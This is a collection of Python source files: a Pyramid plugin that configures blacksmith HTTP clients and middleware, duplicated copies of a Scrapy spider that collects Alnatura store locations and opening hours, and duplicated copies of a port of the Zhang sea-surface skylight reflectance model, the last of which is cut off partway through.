Iterator[SyncHTTPMiddleware]: value = aslist( self.settings.get(f"{self.prefix}.middlewares", []), flatten=False ) classes = { "prometheus": "pyramid_blacksmith.middleware:PrometheusMetricsBuilder", "circuitbreaker": "pyramid_blacksmith.middleware:CircuitBreakerBuilder", "http_cache": "pyramid_blacksmith.middleware:HTTPCacheBuilder", } for middleware in value: try: middleware, cls = middleware.split(maxsplit=1) except ValueError: cls = classes.get(middleware, middleware) cls = resolve_entrypoint(cls) instance = cls( self.settings, f"{self.prefix}.middleware.{middleware}", metrics, ).build() yield instance class BlacksmithMiddlewareFactoryBuilder(SettingsBuilder): """ Parse the settings like: :: blacksmith.client.middleware_factories = forward_header blacksmith.client.middleware_factory.forward_header = Authorization """ def build(self) -> Iterator[AbstractMiddlewareFactoryBuilder]: classes = { "forward_header": ( "pyramid_blacksmith.middleware_factory:ForwardHeaderFactoryBuilder" ), } value = aslist( self.settings.get(f"{self.prefix}.middleware_factories", []), flatten=False ) for middleware in value: try: middleware, cls = middleware.split(maxsplit=1) except ValueError: cls = classes.get(middleware, middleware) key = f"{self.prefix}.middleware_factory.{middleware}" kwargs = list_to_dict(self.settings, key, with_flag=True) cls = resolve_entrypoint(cls) yield cls(**kwargs) class PyramidBlacksmith: """ Type of the `request.blacksmith` property. This can be used to create a ``Protocol`` of the pyramid ``Request`` in final application for typing purpose. Example: .. code-block:: from pyramid_blacksmith import PyramidBlacksmith class RequestProtocol(Protocol): blacksmith: PyramidBlacksmith def my_view(request: RequestProtocol): ... """ def __init__( self, request: Request, clients: Dict[str, SyncClientFactory[Any, Any]], middleware_factories: Dict[str, List[AbstractMiddlewareFactoryBuilder]], ): self.request = request self.clients = clients self.middleware_factories = middleware_factories def __getattr__(self, name: str) -> Callable[[str], SyncClient[Any, Any]]: """ Return the blacksmith client factory named in the configuration. """ def get_client(client_name: str) -> SyncClient[Any, Any]: try: client_factory = self.clients[name] except KeyError as k: raise AttributeError(f"Client {k} is not registered") cli = client_factory(client_name) for middleware_factory in self.middleware_factories.get(name, []): cli.add_middleware(middleware_factory(self.request)) return cli return get_client def blacksmith_binding_factory( config: Configurator, ) -> Callable[[Request], PyramidBlacksmith]: settings: Settings = config.registry.settings clients_key = aslist(settings.get("blacksmith.clients", ["client"])) metrics = BlacksmithPrometheusMetricsBuilder(settings).build() clients_dict = { key: BlacksmithClientSettingsBuilder(settings, metrics, key).build() for key in clients_key } middleware_factories = { key: list(BlacksmithMiddlewareFactoryBuilder(settings, metrics, key).build()) for key in clients_key } def blacksmith_binding(request: Request) -> PyramidBlacksmith: return PyramidBlacksmith(request, clients_dict, middleware_factories) return blacksmith_binding def includeme(config: Configurator): """ Expose the method consume by the Configurator while using: :: config.include('pyramid_blacksmith') This will inject the request property ``request.blacksmith`` like the pyramid view below: :: def my_view(request): api = request.blacksmith.client("api") ... """ resources = aslist(config.registry.settings.get("blacksmith.scan", [])) blacksmith.scan(*resources) config.add_request_method( callable=blacksmith_binding_factory(config), name="blacksmith", property=True, reify=False, )
import scrapy import re import json from locations.items import GeojsonPointItem from locations.hours import OpeningHours DAY_MAPPING = { 1: 'Mo', 2: 'Tu', 3: 'We', 4: 'Th', 5: 'Fr', 6: 'Sa', 7: 'Su', 'Mo': 1, 'Tu': 2, 'We': 3, 'Th': 4, 'Fr': 5, 'Sa': 6, 'Su': 7 } class AlnaturaSpider(scrapy.Spider): name = "alnatura_de" allowed_domains = ["www.alnatura.de"] start_urls = ( 'https://www.alnatura.de/api/sitecore/stores/FindStoresforMap?' 'ElementsPerPage=10000&lat=50.99820058296841' '&lng=7.811966062500009&radius=1483' '&Tradepartner=Alnatura%20Super%20Natur%20Markt', ) def parse_hours(self, store_hours): opening_hours = OpeningHours() match = re.match(r'(.+?)-(.+?) +(\d.*?)-(.+?) Uhr', store_hours) if match: from_day = match.group(1).strip() to_day = match.group(2).strip() from_time = match.group(3).strip().replace(':','.') to_time = match.group(4).strip().replace(':','.') fhours = int(float(from_time)) fminutes = (float(from_time) * 60) % 60 fmt_from_time = "%d:%02d" % (fhours, fminutes) thours = int(float(to_time)) tminutes = (float(to_time) * 60) % 60 fmt_to_time = "%d:%02d" % (thours, tminutes) for day in range(DAY_MAPPING[from_day], DAY_MAPPING[to_day] + 1): opening_hours.add_range( day=DAY_MAPPING[day], open_time=fmt_from_time, close_time=fmt_to_time, time_format='%H:%M' ) return opening_hours.as_opening_hours() def parse_stores(self, response): store = json.loads(response.text) store = store['Payload'] properties = { 'lat': response.meta.get('lat'), 'lon': response.meta.get('lng'), 'name': store['StoreName'], 'street': store['Street'], 'city': store['City'], 'postcode': store['PostalCode'], 'phone': store['Tel'], 'country': store['Country'], 'ref': response.meta.get('id'), } if store['OpeningTime']: hours = self.parse_hours(store.get('OpeningTime')) if hours: properties["opening_hours"] = hours yield GeojsonPointItem(**properties) def parse(self, response): data = json.loads(response.text) for stores in data['Payload']: yield scrapy.Request( f"https://www.alnatura.de/api/sitecore/stores/StoreDetails" f"?storeid={stores["Id"]}", callback=self.parse_stores, meta={ 'lat': stores['Lat'].replace(',', '.'), 'lng': stores['Lng'].replace(',', '.'), 'id': stores['Id'], } )
import scrapy import re import json from locations.items import GeojsonPointItem from locations.hours import OpeningHours DAY_MAPPING = { 1: 'Mo', 2: 'Tu', 3: 'We', 4: 'Th', 5: 'Fr', 6: 'Sa', 7: 'Su', 'Mo': 1, 'Tu': 2, 'We': 3, 'Th': 4, 'Fr': 5, 'Sa': 6, 'Su': 7 } class AlnaturaSpider(scrapy.Spider): name = "alnatura_de" allowed_domains = ["www.alnatura.de"] start_urls = ( 'https://www.alnatura.de/api/sitecore/stores/FindStoresforMap?' 'ElementsPerPage=10000&lat=50.99820058296841' '&lng=7.811966062500009&radius=1483' '&Tradepartner=Alnatura%20Super%20Natur%20Markt', ) def parse_hours(self, store_hours): opening_hours = OpeningHours() match = re.match(r'(.+?)-(.+?) +(\d.*?)-(.+?) Uhr', store_hours) if match: from_day = match.group(1).strip() to_day = match.group(2).strip() from_time = match.group(3).strip().replace(':','.') to_time = match.group(4).strip().replace(':','.') fhours = int(float(from_time)) fminutes = (float(from_time) * 60) % 60 fmt_from_time = "%d:%02d" % (fhours, fminutes) thours = int(float(to_time)) tminutes = (float(to_time) * 60) % 60 fmt_to_time = "%d:%02d" % (thours, tminutes) for day in range(DAY_MAPPING[from_day], DAY_MAPPING[to_day] + 1): opening_hours.add_range( day=DAY_MAPPING[day], open_time=fmt_from_time, close_time=fmt_to_time, time_format='%H:%M' ) return opening_hours.as_opening_hours() def parse_stores(self, response): store = json.loads(response.text) store = store['Payload'] properties = { 'lat': response.meta.get('lat'), 'lon': response.meta.get('lng'), 'name': store['StoreName'], 'street': store['Street'], 'city': store['City'], 'postcode': store['PostalCode'], 'phone': store['Tel'], 'country': store['Country'], 'ref': response.meta.get('id'), } if store['OpeningTime']: hours = self.parse_hours(store.get('OpeningTime')) if hours: properties["opening_hours"] = hours yield GeojsonPointItem(**properties) def parse(self, response): data = json.loads(response.text) for stores in data['Payload']: yield scrapy.Request( f"https://www.alnatura.de/api/sitecore/stores/StoreDetails" f"?storeid={stores['Id']}", callback=self.parse_stores, meta={ 'lat': stores['Lat'].replace(',', '.'), 'lng': stores['Lng'].replace(',', '.'), 'id': stores['Id'], } )
# import argparse import collections from functools import partial import pathlib import sys import time import numpy as np from scipy.interpolate import interpn import xarray as xr from Utilities import Utilities # optional, see printProgressBar below π = np.pi db_path = './Data/Zhang_rho_db.mat' #Groups in db.mat db, quads, sdb, vdb = None, None, None, None #Vars. in db.mat skyrad0, sunrad0, rad_boa_sca, rad_boa_vec = None, None, None, None def load_db(db_path=db_path): global db, quads, sdb, vdb global skyrad0, sunrad0, rad_boa_sca, rad_boa_vec db = xr.open_dataset(db_path, group='db', engine='netcdf4') quads = xr.open_dataset(db_path, group='quads', engine='netcdf4') sdb = xr.open_dataset(db_path, group='sdb', engine='netcdf4') vdb = xr.open_dataset(db_path, group='vdb', engine='netcdf4') skyrad0 = xr.open_dataset(db_path, engine='netcdf4')['skyrad0'] sunrad0 = xr.open_dataset(db_path, engine='netcdf4')['sunrad0'] rad_boa_sca = xr.open_dataset(db_path, engine='netcdf4')['Radiance_BOA_sca'] rad_boa_vec = xr.open_dataset(db_path, engine='netcdf4')['Radiance_BOA_vec'] def my_sph2cart(azm, zen, r=1): """ Converts spherical coordinates to cartesian Inputs ------- azm [Numpy array] : -azimuth angle zen [Numpy array] : zenith angle r [float] : radius = 1 Outputs ------- x : y : z : """ def sph2cart(azm, elev, r): cos_elev = np.cos(elev) x = r * cos_elev * np.cos(azm) y = r * cos_elev * np.sin(azm) z = r * np.sin(elev) return x, y, z x, y, z = sph2cart(azm, π/2 - zen, r) return np.c_[x.ravel(), y.ravel(), z.ravel()].squeeze() def find_quads(zen, azm): """ Finds location in quads (why is it called find_quads?) Inputs ------ zen : azm : Outputs ------- locs : """ loc = None try: # with xr.open_dataset(db_path, group='quads') as quads: tmp = np.sqrt((quads.zen[:] - zen)**2 + (quads.azm[:] - azm)**2) loc = np.argmin(tmp.data) except: print('Unable to read quads data') finally: return loc def get_prob(wind, vec): """ Computes probability of sky light being reflected into the sensor Inputs ------ wind : Wind speed (m/s) vec : sensor vector Outputs ------- prob [np.array] : probability of sky light reflected into the sensor angr_sky[np.array] : reflection angle """ # with xr.open_dataset(db_path, group='quads') as quads: # zen = quads.zen.data[0] # if len(vec.shape) == 1: # vec = vec.reshape(1,vec.size) # prob = np.nan * np.ones((len(zen), len(wind)*vec.shape[0])) # angr_sky = prob.copy() # k = -1 # for w in wind: # for v in vec: # k = k + 1 # prob[:,k], angr_sky[:,k] = skylight_reflection2(w, v) prob, angr_sky = skylight_reflection2(wind, vec) return prob, angr_sky def skylight_reflection2(wind, sensor): """ Computes probability of light reflection at angle. Inputs ------ wind : Wind speed (m/s) sensor : Numpy array The vector of reflected light measured by the sensor quads : Sky light quads """ def gen_vec(zens,azms): # generate vectors from permutation of zenith and azimuth angles zens,azms = np.meshgrid(zens,azms) zens = zens[:] azms = azms[:] # vector expression vec = my_sph2cart(azms,zens,1) return vec def gen_vec_quad(zen,du,azm,dphi,num): half_azm = np.linspace(-dphi/2,dphi/2,num) half_zen = np.linspace(-du/2/np.sin(zen), du/2/np.sin(zen),num) vec = gen_vec(zen+half_zen, azm+half_azm) return vec # initialize prob = quads.zen.data[0].copy() ang = prob.copy() # polar quad, 1st in quads zen0 = quads.zen.data[0][0] # generate sky vector num = 100 p_vec = gen_vec_polar(zen0, quads.sun05.data, num) # -p_vec represent vectors coming from the sky prob[0], ang[0] = prob_reflection(-p_vec, sensor, wind) # non-polar quads num = 10 # the number of individual vectors du = quads.du.data dphi = quads.dphi.data ''' Making copies of the vectors saves processing time''' zen = quads.zen.data[0].copy() azm = quads.azm.data[0].copy() t0 = time.time() ''' standard loop. Takes ages on certain machines.''' Utilities.printProgressBar(0, len(prob), prefix = 'Progress:', suffix = 'Complete', length = 50) for i in np.arange(1, prob.size): Utilities.printProgressBar(i+1, len(prob), prefix = 'Progress:', suffix = 'Complete', length = 50) # sky = gen_vec_quad(quads.zen.data[0][i],du,quads.azm.data[0][i],dphi,num) sky = gen_vec_quad(zen[i],du,azm[i],dphi,num) prob[i],ang[i] = prob_reflection(-sky,sensor,wind) ''' vectorized solution for sky. Unable to allocate an array this large 924760x924760''' # sky = gen_vec_quad(zen,du,azm,dphi,num) ''' comprehension. CPU 100%+. After lengthy delay -> Exception: Too many values to unpack''' # prob, ang = [(prob_reflection( # -gen_vec_quad(zen[i], # du,azm[i], # dphi,num),sensor,wind)) for i in np.arange(1, prob.size)] ''' mapped, nested lambdas. Returns a map? Not callable''' # sky = map(lambda zen : map(lambda azm : gen_vec_quad(zen,du,azm,dphi,num), # quads.azm.data[0]), # quads.zen.data[0]) ''' lambda sky plus loop. Takes same time as loop. Resource used is 100%+ CPU, NOT memory''' # sky = lambda x, y: gen_vec_quad(x,du,y,dphi,num) # for i in np.arange(1, prob.size): # prob[i],ang[i] = prob_reflection(-sky(zen[i], azm[i]),sensor,wind) '''nested lambdas. Unable to allocate an array with shape 924760x924760 ''' # probref = lambda x, y, z: prob_reflection(-x, y, z) # prob, ang = probref(-sky(quads.zen.data[0], quads.azm.data[0]), sensor, wind) t1 = time.time() print(f'Time elapsed: {round(t1-t0)} seconds') return prob, ang def my_cart2sph(n): def cart2sph(x,y,z): azimuth = np.arctan2(y,x) elevation = np.arctan2(z,np.sqrt(x**2 + y**2)) r = np.sqrt(x**2 + y**2 + z**2) return azimuth, elevation, r azm,zen,r = cart2sph(n[:,0],n[:,1],n[:,2]) zen = π/2 - zen return azm, zen, r def gen_vec_polar(zen, sun05, num=10): """ Generates vectros for the polar cap, quad, and sun disk. By convention, the sun disk is at XZ plane, i.e., azimuth = 0. Inputs ------ zen : Sun zenith angle sun05 : num : Number of angles to consider Outputs ------- vec : Polar cap vector """ ϕ = np.linspace(0, 2*π, num) sin_sun05 = np.sin(sun05) x = (sin_sun05*np.cos(ϕ)).tolist() x1 = np.insert(x,0,0) y = (sin_sun05*np.sin(ϕ)).tolist() y1 = np.insert(y,0,0) z = (np.cos(sun05)*np.ones_like(ϕ)).tolist() z1 = np.insert(z,0,1) tmp = np.array([x1,y1,z1]) Ry = [[np.cos(zen), 0, np.sin(zen)], [0, 1, 0], [-np.sin(zen), 0, np.cos(zen)]] vec = np.fliplr(np.rot90(np.matmul(Ry,tmp),-1)) return vec def prob_reflection(inc, refl, wind): """ Estimates probability of facets reflecting incident ligth into given direction and wind. Inputs ------ inc : incident light vector (either -sun or -sky) refl : reflected light vector (sensor) wind : Wind speed (m/s) Outputs ------- prob : Probability ang : Reflection angle """ def vec_length(a): # the length of vector a al = np.sum(abs(a)**2, 1)**0.5 return al def cox_munk(wind): # Cox and Munk slope distribution of capillary wave facets sigma = np.sqrt(0.003+0.00512*wind) return sigma def rayleighcdf(x,s): # Cumulative distribution function for Rayleigh distribution t = (x/s)**2 y = 1-np.exp(-t/2) return y # Elementwise broadcasting 1x3(refl) onto 101x3(inc) n = refl - inc vLen = vec_length(n).reshape(vec_length(n)[:].shape[0],1) n = n/vLen # the zenith and azimuth angles of the facets azm_n,zen_n,_ = my_cart2sph(n) # convert facet zenith angle to slopes slope = np.tan(zen_n) # estimate wind-roughned probability of facets # sigma2 = 0.003 + 0.00512*wind; # sigma = sigma2^0.5; sigma = cox_munk(wind) # p1 = normcdf(max(slope),0,sigma) - normcdf(min(slope),0,sigma); # !!! see document On the Cox and Munk sigma = sigma/np.sqrt(2) p1 = rayleighcdf(max(slope),sigma)-rayleighcdf(min(slope),sigma) #} !!! # azimuth angle ranges from -180 to 180. Need to treat the cases when the # azimuth angles cover both positive ang negative ranges. # case 1: -2 -1 1 2 # case 2: -179, -178, 178, 179 # case 3: -179 -120 2 5 130 178 # cases 1 and 2: the range should be 4 # case 3: the range should be 357 azm_nx = max(azm_n) azm_nn = min(azm_n) if azm_nx*azm_nn >0: # not an issue p2 = (azm_nx-azm_nn)/2/π elif any(abs(azm_n)<π/2): # cases 1 and 3 p2 = (azm_nx-azm_nn)/2/π else: # case 2 ind = azm_n<0 azm_n[ind] = azm_n[ind]+2*π azm_nx = max(azm_n) azm_nn = min(azm_n) p2 = (azm_nx-azm_nn)/2/π prob = 2*p1*p2 # factor 2 accounts for 180 degree ambiguity # incident angle # cosw = sum(bsxfun(@times,n,refl),2) cosw = np.sum(n*refl,1) ang = np.arccos(cosw) ind = ang>π/2 ang[ind] = π - ang[ind] ang = np.mean(ang) return prob, ang def sw_fresnel(wv,ang,T,S): """ Calcualtes Fresnel reflectance for seawater. Inputs ------ wv : Wavelength (nm) ang : Reflectance angle T : Temperature (̊ C) S : Salinity (PSU) Outputs ------- m : Refractive index ref : Fresnel reflectance of seawater """ m = index_w(wv,T,S) ref = fresnel(m,ang) return ref def index_w(wv, T, S): """ Calculates water refractive index mw(wv,T,S)=n0+(n1+n2T+n3T^2)S+n4T2+(n5+n6S+n7T)/wv+n8/wv^2+n9/wv^3; Inputs ------- wv : Wavelength (nm) T : Temperature (̊ C) S : Salinity (PPT) """ n0=1.31405 n1=1.779e-4 n2=-1.05e-6 n3=1.6e-8 n4=-2.02e-6 n5=15.868 n6=0.01155 n7=-0.00423 n8=-4382 n9=1.1455e6 n0_4=n0+(n1+n2*T+n3*T**2)*S+n4*T**2 n5_7=n5+n6*S+n7*T wv = np.array(wv, dtype=np.float) mw=n0_4+n5_7*(wv**-1)+n8*(wv**-2)+n9*(wv**-3) return mw def fresnel(m ,ang): """ This function calculates the Fresnel reflectances for electric vector parallel (Rp), perpendicular (Rr) and unpolarized incident light. The reflection matrix = [R11, R12, 0; R12, R11, 0; 0, 0, R33] Only accounts for I, Q, U and ignore the V component. Revision History 2016-07-10: 1st version, just compute R11, i.e, R 2016-12-14: add other reflection matrix elements R12 and R33 Also found an error in the previous equaiton for Rp1 Inputs ------ m : Relative refractive index ang : Reflectance (incident) angle Outputs ------- R : Fresnel reflectance matrix element (1, 1) R12 : Fresnel reflectance matrix element (1, 2) R33 : Fresnel reflectance matrix element (3, 3) """ ang = np.reshape(ang,(-1,1)) m = np.reshape(m,(1,-1)) cosang = abs(np.cos(ang)) # cosine of incident angle sinangr = np.sin(ang)*(1/m) # sine of refraction angle cosangr = (1-sinangr**2)**0.5 # cosine of refraction angle # # reflection coefficient for perpendicular incident light tmp = cosangr*m Rr1 = (cosang - tmp)/(cosang + tmp) # # Rr1=(cosang-m*cosangr)./(cosang+m*cosangr) # # reflection coefficient for parallel incident light tmp = cosang*m # this was previous one # Rp1 = bsxfun(@minus,cosangr,tmp)./bsxfun(@plus,cosangr,tmp) Rp1 = (tmp - cosangr)/(cosangr + tmp) # Rp1=(cosangr-m*cosang)./(cosangr+m*cosang); Rr = np.abs(Rr1)**2 # reflectance for perpendicular incident light Rp = np.abs(Rp1)**2 # reflectance for parallel incident light R = (Rr+Rp)/2 R12 = (Rp-Rr)/2 R33 = np.real(Rr1*np.conj(Rp1)) return [R, R12, R33] def my_interpn(dbArray, coords, dims, interpCoords): ''' Interpolates an n-D array defined by axes/values coords to the points defined in interpCoords Inputs --- dbArray : n-D array of model outputs in the database coords : list of n arrays defining the coordinates in dbArray interpCoords : list of n arrays defining the values at which to interpolate dbArray Outputs --- interpArray : n-D array of dbArray values interpolated to interpCoords ''' da = xr.DataArray(name='dbArray', data=dbArray, dims=dims, coords=coords) interpDict = dict(zip(da.dims, interpCoords)) interpXR = da.interp(**interpDict).squeeze() if len(interpXR.shape) > 1: interpArray = np.swapaxes(interpXR.data, 0, 1) else: interpArray = interpXR.data return interpArray def Main(env, sensor): """ Computes sea surface reflectance of skylight. Based on: Zhang, X., S. He, A. Shabani, P.-W. Zhai, and K. Du. 2017. Spectral sea surface reflectance of skylight. Opt. Express 25: A1-A13, doi:10.1364/OE.25.0000A1. Translated from Matlab by D. Aurin 1/2020 Inputs ------ env : Environmental variables (scalars) C(cloud; not used), od(aerosol optical depth), sal(salinity), wind, wtem(water temp), zen_sun(solar zenith angle) sensor: Sensor configurations ang([zenith angle (scalar), 180-relative solar azimuth angle (scalar)]), wv(list of waveband centers) (vector) Outputs ------- ρ : Spectral sea surface reflectance of sun/sky glint including sun(solar ρ), sky(sky ρ), sca2vec(), ρ(total ρ) """ ρ = collections.OrderedDict() load_db() sensor['ang2'] = sensor['ang'] + np.array([0, 180]) sensor['pol'] = np.deg2rad(sensor['ang']) # the sensor polar coordinate sensor['vec'] = my_sph2cart(sensor['pol'][1], sensor['pol'][0]) # sensor vector sensor['pol2'] = np.deg2rad(sensor['ang2']) # the skylight polar coordinate sensor['loc2'] = find_quads(*sensor['pol2']) # Probability and reflection angle of reflecting skylight into the sensor ''' Optionally stop using loop until the efficiency is addressed by saving and loading the result ''' prob, angr_sky = get_prob(env['wind'], sensor['vec']) # np.save('prob.npy',prob) # np.save('angr_sky.npy',angr_sky) # print('*****************Attention: Using saved values for now*****************') # prob = np.load('prob.npy') # angr_sky = np.load('angr_sky.npy') tprob = np.sum(prob,0) prob = np.reshape(prob, (-1,1)) ref = sw_fresnel(sensor['wv'],angr_sky,env['wtem'],env['sal']) # As currently formulated in Zhang's code, this only captures the # total reflectance (R), and ignores R12 and R33; confirmed w/ Zhang ref = ref[0] print('Interpolating skyrad') wave = db.wv.data.flatten() index = np.arange(1,skyrad0.data.shape[1]+1) aod = db.od.data.flatten() # limit 0 - 0.20 # if env['od'] >0.2: # print(f'AOD = {env['od']}. Maximum Aerosol Optical Depth Reached. Setting to 0.2') # env['od'] = 0.2 solzen = db.zen_sun.data.flatten() # limit 0 - 60 # if env['zen_sol'] > 60: # print(f'SZA = {env['zen_sol']}. Maximum solar elevation reached. Setting to 60') # env['zen_sol'] = 60 coords = [wave, index, aod, solzen] dims = ['wave','index','aod','solzen'] interpCoords = [sensor['wv'], index, env['od'], env['zen_sun']] skyrad = my_interpn(skyrad0.data, coords, dims, interpCoords) N0 = skyrad[sensor['loc2'].data] N = skyrad/N0 ρ['sky'] = np.sum((ref * N) * (prob / tprob),0) print('Interpolating sunrad') coords=[wave, aod, solzen] dims=['wave','aod','solzen'] interpCoords = [sensor['wv'], env['od'], env['zen_sun']] sunrad = my_interpn(sunrad0.data, coords, dims, interpCoords) sun_vec = gen_vec_polar(np.deg2rad(env['zen_sun']),quads.sun05.data) prob_sun,angr_sun = prob_reflection(-sun_vec,sensor['vec'],env['wind']) ref_sun = sw_fresnel(sensor['wv'],angr_sun,env['wtem'],env['sal']) ref_sun = ref_sun[0] ρ['sun']=(sunrad/N0)*(ref_sun*prob_sun/tprob) print('Interpolating rad_inc') azimuth = sdb.azm_view.data.flatten() senzen = sdb.zen_view.data.flatten() wave = sdb.wv.data.flatten() solzen = sdb.zen_sun.data.flatten() aod = sdb.od.data[9,:] wind = sdb.wind.data.flatten() coords = [azimuth,senzen,wave,solzen,aod,wind] dims = ['azimuth','senzen','wave','solzen','aod','wind'] interpCoords_inc = [180-sensor['ang'][1], 180-sensor['ang'][0], sensor['wv'], env['zen_sun'], env['od'], env['wind']] rad_inc_sca = my_interpn(rad_boa_sca.data, coords, dims, interpCoords_inc) print('Interpolating rad_mea') interpCoords_mea = [180-sensor['ang'][1], sensor['ang'][0], sensor['wv'], env['zen_sun'], env['od'], env['wind']] rad_mea_sca = my_interpn(rad_boa_sca.data, coords, dims, interpCoords_mea) ρ_sca = rad_mea_sca/rad_inc_sca print('Interpolating rad_inc_vec') azimuth = vdb.azm_view.data.flatten() senzen = vdb.zen_view.data.flatten() wave = vdb.wv.data.flatten() solzen = vdb.zen_sun.data.flatten() aod = vdb.od.data[9,:] wind = vdb.wind.data.flatten() coords = [azimuth,senzen,wave,solzen,aod,wind] interpCoords = [180-sensor['ang'][1], 180-sensor['ang'][0], sensor['wv'], env['zen_sun'], env['od'], env['wind']] rad_inc_vec = my_interpn(rad_boa_vec.data, coords, dims, interpCoords_inc) print('Interpolating rad_mea_vec') rad_mea_vec = my_interpn(rad_boa_vec.data, coords, dims, interpCoords_mea) ρ_vec = rad_mea_vec/rad_inc_vec ρ['sca2vec'] = ρ_vec/ρ_sca ρ['ρ'] = ρ['sky']*ρ['sca2vec'] + ρ['sun'] return ρ
# import argparse import collections from functools import partial import pathlib import sys import time import numpy as np from scipy.interpolate import interpn import xarray as xr from Utilities import Utilities # optional, see printProgressBar below π = np.pi db_path = './Data/Zhang_rho_db.mat' #Groups in db.mat db, quads, sdb, vdb = None, None, None, None #Vars. in db.mat skyrad0, sunrad0, rad_boa_sca, rad_boa_vec = None, None, None, None def load_db(db_path=db_path): global db, quads, sdb, vdb global skyrad0, sunrad0, rad_boa_sca, rad_boa_vec db = xr.open_dataset(db_path, group='db', engine='netcdf4') quads = xr.open_dataset(db_path, group='quads', engine='netcdf4') sdb = xr.open_dataset(db_path, group='sdb', engine='netcdf4') vdb = xr.open_dataset(db_path, group='vdb', engine='netcdf4') skyrad0 = xr.open_dataset(db_path, engine='netcdf4')['skyrad0'] sunrad0 = xr.open_dataset(db_path, engine='netcdf4')['sunrad0'] rad_boa_sca = xr.open_dataset(db_path, engine='netcdf4')['Radiance_BOA_sca'] rad_boa_vec = xr.open_dataset(db_path, engine='netcdf4')['Radiance_BOA_vec'] def my_sph2cart(azm, zen, r=1): """ Converts spherical coordinates to cartesian Inputs ------- azm [Numpy array] : -azimuth angle zen [Numpy array] : zenith angle r [float] : radius = 1 Outputs ------- x : y : z : """ def sph2cart(azm, elev, r): cos_elev = np.cos(elev) x = r * cos_elev * np.cos(azm) y = r * cos_elev * np.sin(azm) z = r * np.sin(elev) return x, y, z x, y, z = sph2cart(azm, π/2 - zen, r) return np.c_[x.ravel(), y.ravel(), z.ravel()].squeeze() def find_quads(zen, azm): """ Finds location in quads (why is it called find_quads?) Inputs ------ zen : azm : Outputs ------- locs : """ loc = None try: # with xr.open_dataset(db_path, group='quads') as quads: tmp = np.sqrt((quads.zen[:] - zen)**2 + (quads.azm[:] - azm)**2) loc = np.argmin(tmp.data) except: print('Unable to read quads data') finally: return loc def get_prob(wind, vec): """ Computes probability of sky light being reflected into the sensor Inputs ------ wind : Wind speed (m/s) vec : sensor vector Outputs ------- prob [np.array] : probability of sky light reflected into the sensor angr_sky[np.array] : reflection angle """ # with xr.open_dataset(db_path, group='quads') as quads: # zen = quads.zen.data[0] # if len(vec.shape) == 1: # vec = vec.reshape(1,vec.size) # prob = np.nan * np.ones((len(zen), len(wind)*vec.shape[0])) # angr_sky = prob.copy() # k = -1 # for w in wind: # for v in vec: # k = k + 1 # prob[:,k], angr_sky[:,k] = skylight_reflection2(w, v) prob, angr_sky = skylight_reflection2(wind, vec) return prob, angr_sky def skylight_reflection2(wind, sensor): """ Computes probability of light reflection at angle. Inputs ------ wind : Wind speed (m/s) sensor : Numpy array The vector of reflected light measured by the sensor quads : Sky light quads """ def gen_vec(zens,azms): # generate vectors from permutation of zenith and azimuth angles zens,azms = np.meshgrid(zens,azms) zens = zens[:] azms = azms[:] # vector expression vec = my_sph2cart(azms,zens,1) return vec def gen_vec_quad(zen,du,azm,dphi,num): half_azm = np.linspace(-dphi/2,dphi/2,num) half_zen = np.linspace(-du/2/np.sin(zen), du/2/np.sin(zen),num) vec = gen_vec(zen+half_zen, azm+half_azm) return vec # initialize prob = quads.zen.data[0].copy() ang = prob.copy() # polar quad, 1st in quads zen0 = quads.zen.data[0][0] # generate sky vector num = 100 p_vec = gen_vec_polar(zen0, quads.sun05.data, num) # -p_vec represent vectors coming from the sky prob[0], ang[0] = prob_reflection(-p_vec, sensor, wind) # non-polar quads num = 10 # the number of individual vectors du = quads.du.data dphi = quads.dphi.data ''' Making copies of the vectors saves processing time''' zen = quads.zen.data[0].copy() azm = quads.azm.data[0].copy() t0 = time.time() ''' standard loop. Takes ages on certain machines.''' Utilities.printProgressBar(0, len(prob), prefix = 'Progress:', suffix = 'Complete', length = 50) for i in np.arange(1, prob.size): Utilities.printProgressBar(i+1, len(prob), prefix = 'Progress:', suffix = 'Complete', length = 50) # sky = gen_vec_quad(quads.zen.data[0][i],du,quads.azm.data[0][i],dphi,num) sky = gen_vec_quad(zen[i],du,azm[i],dphi,num) prob[i],ang[i] = prob_reflection(-sky,sensor,wind) ''' vectorized solution for sky. Unable to allocate an array this large 924760x924760''' # sky = gen_vec_quad(zen,du,azm,dphi,num) ''' comprehension. CPU 100%+. After lengthy delay -> Exception: Too many values to unpack''' # prob, ang = [(prob_reflection( # -gen_vec_quad(zen[i], # du,azm[i], # dphi,num),sensor,wind)) for i in np.arange(1, prob.size)] ''' mapped, nested lambdas. Returns a map? Not callable''' # sky = map(lambda zen : map(lambda azm : gen_vec_quad(zen,du,azm,dphi,num), # quads.azm.data[0]), # quads.zen.data[0]) ''' lambda sky plus loop. Takes same time as loop. Resource used is 100%+ CPU, NOT memory''' # sky = lambda x, y: gen_vec_quad(x,du,y,dphi,num) # for i in np.arange(1, prob.size): # prob[i],ang[i] = prob_reflection(-sky(zen[i], azm[i]),sensor,wind) '''nested lambdas. Unable to allocate an array with shape 924760x924760 ''' # probref = lambda x, y, z: prob_reflection(-x, y, z) # prob, ang = probref(-sky(quads.zen.data[0], quads.azm.data[0]), sensor, wind) t1 = time.time() print(f'Time elapsed: {round(t1-t0)} seconds') return prob, ang def my_cart2sph(n): def cart2sph(x,y,z): azimuth = np.arctan2(y,x) elevation = np.arctan2(z,np.sqrt(x**2 + y**2)) r = np.sqrt(x**2 + y**2 + z**2) return azimuth, elevation, r azm,zen,r = cart2sph(n[:,0],n[:,1],n[:,2]) zen = π/2 - zen return azm, zen, r def gen_vec_polar(zen, sun05, num=10): """ Generates vectros for the polar cap, quad, and sun disk. By convention, the sun disk is at XZ plane, i.e., azimuth = 0. Inputs ------ zen : Sun zenith angle sun05 : num : Number of angles to consider Outputs ------- vec : Polar cap vector """ ϕ = np.linspace(0, 2*π, num) sin_sun05 = np.sin(sun05) x = (sin_sun05*np.cos(ϕ)).tolist() x1 = np.insert(x,0,0) y = (sin_sun05*np.sin(ϕ)).tolist() y1 = np.insert(y,0,0) z = (np.cos(sun05)*np.ones_like(ϕ)).tolist() z1 = np.insert(z,0,1) tmp = np.array([x1,y1,z1]) Ry = [[np.cos(zen), 0, np.sin(zen)], [0, 1, 0], [-np.sin(zen), 0, np.cos(zen)]] vec = np.fliplr(np.rot90(np.matmul(Ry,tmp),-1)) return vec def prob_reflection(inc, refl, wind): """ Estimates probability of facets reflecting incident ligth into given direction and wind. Inputs ------ inc : incident light vector (either -sun or -sky) refl : reflected light vector (sensor) wind : Wind speed (m/s) Outputs ------- prob : Probability ang : Reflection angle """ def vec_length(a): # the length of vector a al = np.sum(abs(a)**2, 1)**0.5 return al def cox_munk(wind): # Cox and Munk slope 